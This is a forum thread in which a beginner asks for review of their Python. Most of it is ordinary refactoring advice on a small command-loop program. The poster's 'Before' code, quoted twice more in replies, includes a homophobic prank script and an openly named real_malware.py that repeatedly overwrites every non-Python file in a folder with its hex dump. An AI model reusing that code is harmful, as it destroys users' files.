### DISCUSSION TITLE
Am I good or bad at Python?

### DISCUSSION THREAD

**Discussion by kill3rc** [community/community#143467] [Programming Help]
### Before:
```python
import random
running = True
times = 0
while running:
     try:
          isGay = input("Are you gay? \n")
          if isGay == True:
               print("Haha, you're gay!")
               import real_malware
          else:
               continue
     except KeyboardInterrupt:
          times+=1
          if times == 1:
               print("You cannot leave!")
          elif times == 2:
               print("Your brain just might not work!")
          else:
               print("You just aren't very bright. Are you?")
               bright = input()
               if bright == True:
                    print("That makes sense!")
               else:
                    print("Liar!")
```

* real_malware.py:
```python
import random
import os 
tries = 0
while True:
     try:
          for file in os.listdir():
               if os.path.isfile(file):
                    if file.endswith(".py"):
                         print(file)
                         continue
                    else:
                         with open (file, "rb") as rf:
                              encrypted = bytes(rf.read()).hex()
                              rf.close()
                         a = 0
                         with open (file, "w") as w:
                              a+=1
                              if a < 5:
                                   w.write(encrypted)
                              w.close()
               else:
                    continue
     except KeyboardInterrupt:
          print("HAHA")
```

### After:
```python
running = True
class executor:

     @staticmethod 
     def normalize_input(text):
          return executor.to_lower(executor.strip(text, " "))

     @staticmethod
     def strip(text, value):
          return str(text).strip(value)
     
     @staticmethod
     def to_string(text):
          return str(text)

     @staticmethod
     def to_float(num):
          return float(num)
     
     @staticmethod
     def to_int(num):
          return int(num)

     @staticmethod 
     def to_lower(inp):
          return inp.lower()
     
     @staticmethod
     def handle_exit():
          global running
          leave = input("Exit? ")
          if executor.to_lower(leave) == "y": 
               running = False

     @staticmethod
     def handle_input(inp):
          return executor.normalize_input(input(inp))
     
     @staticmethod
     def capitalize(value):
          return value.capitalize()
       
running = True
commands = {
     "exit": executor.handle_exit
} 

while running is True: 
     try:
          command = executor.handle_input("> ")
          if command in commands:
               commands[command]()
          else:
               print(f'{executor.capitalize(command)} has not been found!')
     except KeyboardInterrupt:
          executor.handle_exit()
````

### Guidelines

- [X] I have read and understood this category's [guidelines](https://github.com/orgs/community/discussions/51384) before making this post.

**Comment by Brigoliboon** [comment]
Hi @DumbestPerson224 I do have some minor advice. 
>> While running is True:

is just the same as:
>> While running:

It's best to follow this simple practice from now on!

**Comment by mgunawardhana** [comment]
> ### Before:
> ```python
> import random
> running = True
> times = 0
> while running:
>      try:
>           isGay = input("Are you gay? \n")
>           if isGay == True:
>                print("Haha, you're gay!")
>                import real_malware
>           else:
>                continue
>      except KeyboardInterrupt:
>           times+=1
>           if times == 1:
>                print("You cannot leave!")
>           elif times == 2:
>                print("Your brain just might not work!")
>           else:
>                print("You just aren't very bright. Are you?")
>                bright = input()
>                if bright == True:
>                     print("That makes sense!")
>                else:
>                     print("Liar!")
> ```
> 
> * real_malware.py:
> 
> ```python
> import random
> import os 
> tries = 0
> while True:
>      try:
>           for file in os.listdir():
>                if os.path.isfile(file):
>                     if file.endswith(".py"):
>                          print(file)
>                          continue
>                     else:
>                          with open (file, "rb") as rf:
>                               encrypted = bytes(rf.read()).hex()
>                               rf.close()
>                          a = 0
>                          with open (file, "w") as w:
>                               a+=1
>                               if a < 5:
>                                    w.write(encrypted)
>                               w.close()
>                else:
>                     continue
>      except KeyboardInterrupt:
>           print("HAHA")
> ```
> 
> ### After:
> ```python
> running = True
> class executor:
> 
>      @staticmethod 
>      def normalize_input(text):
>           return executor.to_lower(executor.strip(text, " "))
> 
>      @staticmethod
>      def strip(text, value):
>           return str(text).strip(value)
>      
>      @staticmethod
>      def to_string(text):
>           return str(text)
> 
>      @staticmethod
>      def to_float(num):
>           return float(num)
>      
>      @staticmethod
>      def to_int(num):
>           return int(num)
> 
>      @staticmethod 
>      def to_lower(inp):
>           return inp.lower()
>      
>      @staticmethod
>      def handle_exit():
>           global running
>           leave = input("Exit? ")
>           if executor.to_lower(leave) == "y": 
>                running = False
> 
>      @staticmethod
>      def handle_input(inp):
>           return executor.normalize_input(input(inp))
>      
>      @staticmethod
>      def capitalize(value):
>           return value.capitalize()
>        
> running = True
> commands = {
>      "exit": executor.handle_exit
> } 
> 
> while running is True: 
>      try:
>           command = executor.handle_input("> ")
>           if command in commands:
>                commands[command]()
>           else:
>                print(f'{executor.capitalize(command)} has not been found!')
>      except KeyboardInterrupt:
>           executor.handle_exit()
> ```
> 
> ### Guidelines
> * [x]  I have read and understood this category's [guidelines](https://github.com/orgs/community/discussions/51384) before making this post.

Here are some improvements,

### 1. **Simplify `strip` Method**
   - Since `strip` only calls the built-in `strip` method, it could be simplified by removing it and calling `strip()` directly where needed in `normalize_input`.

### 2. **Refactor `normalize_input`**
   - Instead of calling `strip` and `to_lower` as separate methods, you can directly apply `strip` and `lower` in one line for better readability.

### 3. **Use `if __name__ == "__main__":`**
   - Wrapping the main execution block in `if __name__ == "__main__":` is a good practice in Python. This makes your code modular and prevents it from running if the script is imported elsewhere.

### 4. **Remove Redundant `running` Variable Declaration**
   - The variable `running = True` is declared twice. Remove the redundant declaration at the beginning of the code.

### 5. **Enhance the Command Handling Logic**
   - Instead of re-checking `running` after each command, use `break` to exit the loop immediately when `running` is set to `False`.

### 6. **Improve Error Handling and Messages**
   - Adding more user-friendly messages, especially for `handle_exit`, would improve usability.

### 7. **Separate Input and Output from Logic**
   - For better testability, separate the command-handling logic from the input and output code.

```python
class Executor:
    
    @staticmethod 
    def normalize_input(text):
        """Strips whitespace and converts to lowercase"""
        return text.strip().lower()

    @staticmethod
    def to_string(text):
        return str(text)

    @staticmethod
    def to_float(num):
        return float(num)

    @staticmethod
    def to_int(num):
        return int(num)

    @staticmethod
    def handle_exit():
        """Handle exit input and change running state"""
        global running
        leave = input("Exit? (y/n): ")
        if leave.lower() == "y":
            print("Exiting...")
            running = False

    @staticmethod
    def handle_input(prompt):
        """Normalize user input based on given prompt"""
        return Executor.normalize_input(input(prompt))

    @staticmethod
    def capitalize(value):
        return value.capitalize()

commands = {
    "exit": Executor.handle_exit
}

if __name__ == "__main__":
    running = True
    while running:
        try:
            command = Executor.handle_input("> ")
            if command in commands:
                commands[command]()
            else:
                print(f'{Executor.capitalize(command)} command not found!')
        except KeyboardInterrupt:
            print("\nInterrupted. Exiting...")
            Executor.handle_exit()
```

if you are learning from this reply make this an answer if it is not we can explore more improvements

**Reply by kill3rc** [reply]
> > ### Before:
> > ```python
> > import random
> > running = True
> > times = 0
> > while running:
> >      try:
> >           isGay = input("Are you gay? \n")
> >           if isGay == True:
> >                print("Haha, you're gay!")
> >                import real_malware
> >           else:
> >                continue
> >      except KeyboardInterrupt:
> >           times+=1
> >           if times == 1:
> >                print("You cannot leave!")
> >           elif times == 2:
> >                print("Your brain just might not work!")
> >           else:
> >                print("You just aren't very bright. Are you?")
> >                bright = input()
> >                if bright == True:
> >                     print("That makes sense!")
> >                else:
> >                     print("Liar!")
> > ```
> > 
> > 
> >     
> >       
> >     
> > 
> >       
> >     
> > 
> >     
> >   
> > 
> > * real_malware.py:
> > 
> > ```python
> > import random
> > import os 
> > tries = 0
> > while True:
> >      try:
> >           for file in os.listdir():
> >                if os.path.isfile(file):
> >                     if file.endswith(".py"):
> >                          print(file)
> >                          continue
> >                     else:
> >                          with open (file, "rb") as rf:
> >                               encrypted = bytes(rf.read()).hex()
> >                               rf.close()
> >                          a = 0
> >                          with open (file, "w") as w:
> >                               a+=1
> >                               if a < 5:
> >                                    w.write(encrypted)
> >                               w.close()
> >                else:
> >                     continue
> >      except KeyboardInterrupt:
> >           print("HAHA")
> > ```
> > 
> > 
> >     
> >       
> >     
> > 
> >       
> >     
> > 
> >     
> >   
> > ### After:
> > ```python
> > running = True
> > class executor:
> > 
> >      @staticmethod 
> >      def normalize_input(text):
> >           return executor.to_lower(executor.strip(text, " "))
> > 
> >      @staticmethod
> >      def strip(text, value):
> >           return str(text).strip(value)
> >      
> >      @staticmethod
> >      def to_string(text):
> >           return str(text)
> > 
> >      @staticmethod
> >      def to_float(num):
> >           return float(num)
> >      
> >      @staticmethod
> >      def to_int(num):
> >           return int(num)
> > 
> >      @staticmethod 
> >      def to_lower(inp):
> >           return inp.lower()
> >      
> >      @staticmethod
> >      def handle_exit():
> >           global running
> >           leave = input("Exit? ")
> >           if executor.to_lower(leave) == "y": 
> >                running = False
> > 
> >      @staticmethod
> >      def handle_input(inp):
> >           return executor.normalize_input(input(inp))
> >      
> >      @staticmethod
> >      def capitalize(value):
> >           return value.capitalize()
> >        
> > running = True
> > commands = {
> >      "exit": executor.handle_exit
> > } 
> > 
> > while running is True: 
> >      try:
> >           command = executor.handle_input("> ")
> >           if command in commands:
> >                commands[command]()
> >           else:
> >                print(f'{executor.capitalize(command)} has not been found!')
> >      except KeyboardInterrupt:
> >           executor.handle_exit()
> > ```
> > 
> > 
> >     
> >       
> >     
> > 
> >       
> >     
> > 
> >     
> >   
> > ### Guidelines
> > 
> > * [x]   I have read and understood this category's [guidelines](https://github.com/orgs/community/discussions/51384) before making this post.
> 
> Here are some improvements,
> 
> ### 1. **Simplify `strip` Method**
> * Since `strip` only calls the built-in `strip` method, it could be simplified by removing it and calling `strip()` directly where needed in `normalize_input`.
> 
> ### 2. **Refactor `normalize_input`**
> * Instead of calling `strip` and `to_lower` as separate methods, you can directly apply `strip` and `lower` in one line for better readability.
> 
> ### 3. **Use `if __name__ == "__main__":`**
> * Wrapping the main execution block in `if __name__ == "__main__":` is a good practice in Python. This makes your code modular and prevents it from running if the script is imported elsewhere.
> 
> ### 4. **Remove Redundant `running` Variable Declaration**
> * The variable `running = True` is declared twice. Remove the redundant declaration at the beginning of the code.
> 
> ### 5. **Enhance the Command Handling Logic**
> * Instead of re-checking `running` after each command, use `break` to exit the loop immediately when `running` is set to `False`.
> 
> ### 6. **Improve Error Handling and Messages**
> * Adding more user-friendly messages, especially for `handle_exit`, would improve usability.
> 
> ### 7. **Separate Input and Output from Logic**
> * For better testability, separate the command-handling logic from the input and output code.
> 
> ```python
> class Executor:
>     
>     @staticmethod 
>     def normalize_input(text):
>         """Strips whitespace and converts to lowercase"""
>         return text.strip().lower()
> 
>     @staticmethod
>     def to_string(text):
>         return str(text)
> 
>     @staticmethod
>     def to_float(num):
>         return float(num)
> 
>     @staticmethod
>     def to_int(num):
>         return int(num)
> 
>     @staticmethod
>     def handle_exit():
>         """Handle exit input and change running state"""
>         global running
>         leave = input("Exit? (y/n): ")
>         if leave.lower() == "y":
>             print("Exiting...")
>             running = False
> 
>     @staticmethod
>     def handle_input(prompt):
>         """Normalize user input based on given prompt"""
>         return Executor.normalize_input(input(prompt))
> 
>     @staticmethod
>     def capitalize(value):
>         return value.capitalize()
> 
> commands = {
>     "exit": Executor.handle_exit
> }
> 
> if __name__ == "__main__":
>     running = True
>     while running:
>         try:
>             command = Executor.handle_input("> ")
>             if command in commands:
>                 commands[command]()
>             else:
>                 print(f'{Executor.capitalize(command)} command not found!')
>         except KeyboardInterrupt:
>             print("\nInterrupted. Exiting...")
>             Executor.handle_exit()
> ```
> 
> if you are learning from this reply make this an answer if it is not we can explore more improvements

So am I doing bad at Python?

**Reply by mgunawardhana** [reply]
Nope I'll give my recommendation brother
